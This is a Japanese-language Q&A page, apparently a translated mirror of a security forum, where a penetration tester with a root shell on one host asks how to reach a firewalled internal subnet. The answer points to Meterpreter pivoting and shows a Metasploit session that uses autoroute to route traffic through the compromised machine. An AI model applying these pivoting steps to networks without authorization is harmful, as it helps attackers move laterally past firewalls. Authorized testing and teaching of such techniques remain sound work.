web-dev-qa-db-ja.com

sshトンネリング/ポートフォワーディング/異なるサブネットへのアクセス

こんにちは私はいくつかの良いポインタまたはこの以下に述べるシナリオに関するドキュメントの推奨事項が必要です。最近のペネトレーションテスト中:私のIPは192.168.x.1(kali)です。なんらかの方法で、IP192.168.x.21を使用してUNIXシステムでルートシェルを取得できました。この21システムでifconfigを実行すると、10.1.1.34でeth0&lo、eth0が取得されます。いくつか列挙した後、このサブネット10.1.1.Xがファイアウォールの背後にあり、パブリックから直接接続していないことがわかりました。今、私はこのシステムでテストする必要があります。私のすべてのツールはカリにあるので、この他のシステムをその10.1.1.Xに接続する必要があります。私はこれを行うことができません。この問題を解決するのを手伝ってください。

1
Avik

Meterpreterを使用してピボットできます。 Metasploit Unleashed で説明されている優れたチュートリアルがあります。

meterpreter > ipconfig

Citrix XenServer PV Ethernet Adapter #2 - Packet Scheduler Miniport
Hardware MAC: d2:d6:70:fa:de:65
IP Address  : 10.1.13.3
Netmask     : 255.255.255.0



MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0



Citrix XenServer PV Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: c6:ce:4e:d9:c9:6e
IP Address  : 192.168.1.201
Netmask     : 255.255.255.0

meterpreter > run autoroute -h
[*] Usage:   run autoroute [-r] -s subnet -n netmask
[*] Examples:
[*]   run autoroute -s 10.1.1.0 -n 255.255.255.0  # Add a route to 10.10.10.1/255.255.255.0
[*]   run autoroute -s 10.10.10.1                 # Netmask defaults to 255.255.255.0
[*]   run autoroute -s 10.10.10.1/24              # CIDR notation is also okay
[*]   run autoroute -p                            # Print active routing table
[*]   run autoroute -d -s 10.10.10.1              # Deletes the 10.10.10.1/255.255.255.0 route
[*] Use the "route" and "ipconfig" Meterpreter commands to learn about available routes
meterpreter > run autoroute -s 10.1.13.0/24
[*] Adding a route to 10.1.13.0/255.255.255.0...
[+] Added route to 10.1.13.0/255.255.255.0 via 192.168.1.201
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.1.13.0          255.255.255.0      Session 1
1
Lucas Kauffman